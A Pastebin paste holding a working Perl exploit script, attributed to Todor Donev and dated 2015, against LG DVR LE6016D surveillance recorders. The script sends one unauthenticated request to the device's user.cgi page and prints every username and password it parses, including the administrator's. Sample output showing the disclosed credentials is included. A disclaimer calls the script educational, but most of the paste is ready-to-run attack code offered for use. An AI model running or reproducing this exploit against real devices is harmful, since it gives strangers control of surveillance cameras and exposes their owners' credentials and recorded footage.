Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # LG DVR LE6016D unauthenticated remote
- # users/passwords disclosure exploit
- #
- #
- # Copyright 2015 (c) Todor Donev
- # <todor.donev at gmail.com>
- # http://www.ethical-hacker.org/
- ####
- #
- # Digital video recorder (DVR) surveillance is the use of cameras,
- # often hidden or concealed, that use DVR technology to record
- # video for playback or immediate viewing. As technological
- # innovations have made improvements in the security and
- # surveillance industry, DVR surveillance has become more
- # prominent and allows for easier and more versatile security
- # systems in homes and businesses. A DVR surveillance security
- # system can be designed for indoor use or outdoor use and can
- # often involve hidden security cameras, concealed “nanny cams”
- # for home security, and even personal recording devices hidden
- # on a person.
- #
- ####
- #
- # Description:
- # No authentication (login) is required to exploit this vulnerability.
- # This program demonstrates how unpatched security bug would enable
- # hackers to gain control of a vulnerable device while sitting
- # behind their keyboard, potentially thousands of miles away.
- # An unauthenticated attacker that is connected to the DVR's may be
- # able to retrieve the device's administrator password allowing them
- # to directly access the device's configuration control panel.
- #
- ####
- #
- # Disclaimer:
- # This or previous programs is for Educational purpose ONLY. Do not
- # use it without permission.The usual disclaimer applies, especially
- # the fact that Todor Donev is not liable for any damages caused by
- # direct or indirect use of the information or functionality provided
- # by these programs. The author or any Internet provider bears NO
- # responsibility for content or misuse of these programs or any
- # derivatives thereof. By using these programs you accept the fact
- # that any damage (dataloss, system crash, system compromise, etc.)
- # caused by the use of these programs is not Todor Donev's
- # responsibility.
- #
- ####
- # Use them at your own risk!
- ####
- #
- # $ perl lg.pl 133.7.133.7:80
- # LG DVR LE6016D unauthenticated remote
- # users/passwords disclosure exploit
- # u/p: admin/000000
- # u/p: user1/000000
- # u/p: user2/000000
- # u/p: user3/000000
- # u/p: LOGOUT/000000
- # Copyright 2015 (c) Todor Donev
- # <todor.donev at gmail.com>
- # http://www.ethical-hacker.org/
- #
- ####
- use LWP::Simple;
- print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
- if (@ARGV == 0) {&usg; &foot;}
- while (@ARGV > 0) {
- $t = shift(@ARGV);
- }
- my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
- for (my $i=0; $i <= 4; $i++){
- if ($r =~ m/<name>(.*)<\/name>/g){
- print " u\/p: $1\/";
- }
- if ($r =~ m/<pw>(.*)<\/pw>/g){
- print "$1\n";
- }
- }
- &foot;
- sub usg(){
- print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
- }
- sub foot(){
- print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
- print " http://www.ethical-hacker.org/\n";
- exit;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement